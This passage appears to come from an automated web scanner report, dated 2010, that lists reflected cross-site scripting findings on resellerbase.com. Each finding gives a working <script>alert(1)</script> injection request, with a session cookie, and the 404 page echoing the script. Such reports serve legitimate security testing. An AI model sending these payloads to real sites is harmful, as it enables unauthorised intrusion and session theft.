The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f839a<script>alert(1)</script>ddabcc8ad44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf839a<script>alert(1)</script>ddabcc8ad44/44/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf839a<script>alert(1)</script>ddabcc8ad44/44/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3115. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ec826<script>alert(1)</script>8efa857077c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44ec826<script>alert(1)</script>8efa857077c/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44ec826<script>alert(1)</script>8efa857077c/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3116. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 666f8<script>alert(1)</script>8e852533e76 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes666f8<script>alert(1)</script>8e852533e76/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes666f8<script>alert(1)</script>8e852533e76/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3117. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 41157<script>alert(1)</script>58469b4d7bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos41157<script>alert(1)</script>58469b4d7bc/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos41157<script>alert(1)</script>58469b4d7bc/images/rating/ was not found on this server.</p>
...[SNIP]...

2.3118. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 58d26<script>alert(1)</script>7ecef6e5dfb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images58d26<script>alert(1)</script>7ecef6e5dfb/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images58d26<script>alert(1)</script>7ecef6e5dfb/rating/ was not found on this server.</p>
...[SNIP]...

2.3119. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 78240<script>alert(1)</script>9f7d7c58ba was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating78240<script>alert(1)</script>9f7d7c58ba/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating78240<script>alert(1)</script>9f7d7c58ba/ was not found on this server.</p>
...[SNIP]...

2.3120. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f41b5<script>alert(1)</script>b9e30f09570 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/?f41b5<script>alert(1)</script>b9e30f09570=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/?f41b5<script>alert(1)</script>b9e30f09570=1 was not found on this server.</p>
...[SNIP]...

2.3121. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 79424<script>alert(1)</script>0aa7359c607 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail79424<script>alert(1)</script>0aa7359c607/44/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail79424<script>alert(1)</script>0aa7359c607/44/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3122. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 76ade<script>alert(1)</script>6ae9a05b82b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4476ade<script>alert(1)</script>6ae9a05b82b/themes/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4476ade<script>alert(1)</script>6ae9a05b82b/themes/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3123. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bc5b5<script>alert(1)</script>865ce2849f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesbc5b5<script>alert(1)</script>865ce2849f0/kosmos/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themesbc5b5<script>alert(1)</script>865ce2849f0/kosmos/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3124. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5fe8<script>alert(1)</script>061a0fee5a2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmosd5fe8<script>alert(1)</script>061a0fee5a2/images/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmosd5fe8<script>alert(1)</script>061a0fee5a2/images/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3125. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 713e3<script>alert(1)</script>d708abbcc16 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images713e3<script>alert(1)</script>d708abbcc16/rating/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images713e3<script>alert(1)</script>d708abbcc16/rating/4.gif was not found on this server.</p>
...[SNIP]...

2.3126. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload f8eb1<script>alert(1)</script>69e0aa82370 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/ratingf8eb1<script>alert(1)</script>69e0aa82370/4.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/ratingf8eb1<script>alert(1)</script>69e0aa82370/4.gif was not found on this server.</p>
...[SNIP]...

2.3127. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 896d0<script>alert(1)</script>e534daa8a97 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/4.gif896d0<script>alert(1)</script>e534daa8a97 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:37:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/4.gif896d0<script>alert(1)</script>e534daa8a97 was not found on this server.</p>
...[SNIP]...

2.3128. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/4.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/4.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 37ac1<script>alert(1)</script>406c7d999e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmos/images/rating/4.gif?37ac1<script>alert(1)</script>406c7d999e3=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmos/images/rating/4.gif?37ac1<script>alert(1)</script>406c7d999e3=1 was not found on this server.</p>
...[SNIP]...

2.3129. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f1009<script>alert(1)</script>6156c9bee99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf1009<script>alert(1)</script>6156c9bee99/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf1009<script>alert(1)</script>6156c9bee99/44/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3130. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4f7eb<script>alert(1)</script>50619d9784 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/444f7eb<script>alert(1)</script>50619d9784/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/444f7eb<script>alert(1)</script>50619d9784/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3131. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dcc24<script>alert(1)</script>f154d9ad8f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themesdcc24<script>alert(1)</script>f154d9ad8f3/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themesdcc24<script>alert(1)</script>f154d9ad8f3/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3132. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload bb465<script>alert(1)</script>45955c185a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/44/themes/kosmosbb465<script>alert(1)</script>45955c185a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/44/themes/kosmosbb465<script>alert(1)</script>45955c185a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3133. http://www.resellerbase.com/detail/44/themes/kosmos/images/rating/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/44/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 85709<script>alert(1)</script>da0a91ac93b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

